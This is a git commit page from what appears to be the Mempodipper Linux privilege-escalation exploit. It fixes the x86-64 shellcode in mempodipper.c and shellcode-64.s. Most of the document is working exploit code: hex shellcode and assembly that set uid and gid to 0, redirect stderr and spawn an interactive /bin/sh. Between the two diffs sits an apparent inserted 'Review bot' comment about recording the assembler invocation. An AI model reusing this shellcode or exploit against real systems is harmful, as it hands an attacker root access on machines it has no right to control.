authorJason A. Donenfeld <Jason@zx2c4.com>2012-01-24 06:22:53 +0100
committerJason A. Donenfeld <Jason@zx2c4.com>2012-01-24 06:22:53 +0100
commit948714701ce5a27f560b34301c75ae31b468d477 (patch)
tree0b450d63a69ccc75c250834386d362e6aabaa0e9
parentInitial attempts at ptrace style resolving of symbols. (diff)
Fix shellcode for dirty rsi.
-rw-r--r--mempodipper.c11
-rw-r--r--shellcode-64.s1
2 files changed, 6 insertions, 6 deletions
diff --git a/mempodipper.c b/mempodipper.c
index fccc253..cc2a0fd 100644
--- a/mempodipper.c
+++ b/mempodipper.c
@@ -171,12 +171,11 @@ int main(int argc, char **argv)
#elif defined(__x86_64__)
// See shellcode-64.s in this package for the source.
char shellcode[] =
- "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x40"
- "\xb7\x06\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f\x2f\x62\x69"
- "\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xdb"
- "\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50\x51\x57\x48"
- "\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";
-
+ "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x48"
+ "\x31\xf6\x40\xb7\x06\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f"
+ "\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7"
+ "\x48\x31\xdb\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50"
+ "\x51\x57\x48\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";
#else
#error "That platform is not supported."
#endif
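Review bot: The byte string in `char shellcode[]` is a hand-transcribed copy of the assembler output, and nothing in the file records how it was produced, which is exactly how the previous version drifted from shellcode-64.s. The comment on the line above the array should name the assembler and the invocation (with placeholders for the exact flags, e.g. `// Bytes taken from the .text of shellcode-64.s assembled with <ASSEMBLER> <FLAGS>; re-dump after any edit to the .s file`) so a reader can check that the two stay in sync. The enclosing main() starts and ends outside this hunk, so whether callers use `sizeof shellcode` (which includes the trailing NUL) cannot be checked here.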
diff --git a/shellcode-64.s b/shellcode-64.s
index f465c5d..517b617 100644
--- a/shellcode-64.s
+++ b/shellcode-64.s
@@ -14,6 +14,7 @@ xor rdi,rdi
mov al,0x6a
syscall
;dup2(6, 2)
+xor rsi,rsi
mov dil,0x6
mov sil,0x2
mov al,0x21